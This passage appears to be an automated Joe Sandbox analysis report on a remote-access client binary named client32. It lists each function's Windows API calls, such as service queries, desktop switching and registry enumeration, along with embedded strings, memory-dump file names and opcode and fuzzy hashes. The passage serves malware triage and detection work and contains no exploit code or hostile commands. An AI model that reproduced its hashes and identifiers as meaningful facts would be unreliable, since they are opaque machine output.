                                                                                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                • API String ID: 711243594-1270230032
                                                                                                                                                                • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                                                                                • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                                                                                • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                                                                                                Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                                                                                                • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                                                                                                • GetDC.USER32(00000000), ref: 11133F03
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,033A0598,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                • API String ID: 1594747848-1114959992
                                                                                                                                                                • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                                                                                • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                                                                                                • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                                                                                • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                                                                                                Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,59FD48C0,?,00000000,00000000), ref: 1102CE44
                                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                • API String ID: 83693535-2077998243
                                                                                                                                                                • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                                                                                • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                                                                                                • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                                                                                • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                                                                                                Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11132C60
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11132C91
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                • API String ID: 1170620360-4157686185
                                                                                                                                                                • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                                                                                • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                                                                                                • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                                                                                • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                                                                                                Function 11026BA0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _strtok.LIBCMT ref: 11026C26
                                                                                                                                                                • _strtok.LIBCMT ref: 11026C60
                                                                                                                                                                • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strtok$Sleep
                                                                                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                • API String ID: 2009458258-3774545468
                                                                                                                                                                • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                                                                                • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                                                                                                • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                                                                                • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                                                                                                Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11102CB1
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11102CCF
                                                                                                                                                                Strings
                                                                                                                                                                • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                • API String ID: 2036220054-60805735
                                                                                                                                                                • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                                                                                • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                                                                                                • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                                                                                • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                                                                                                Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                                                                                                • wsprintfA.USER32 ref: 1115E3C8
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                • API String ID: 1734919802-1728070458
                                                                                                                                                                • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                                                                                • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                                                                                                • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                                                                                • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                                                                                                Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1111013A
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                • API String ID: 1976012330-1024648535
                                                                                                                                                                • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                                                                                • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                                                                                                • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                                                                                • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                                                                                                Function 110607F0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,59FD48C0,00000000,?,00000000), ref: 11060874
                                                                                                                                                                • _malloc.LIBCMT ref: 110608BB
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,59FD48C0,00000000), ref: 110608FB
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                                                                                                • _free.LIBCMT ref: 11060974
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
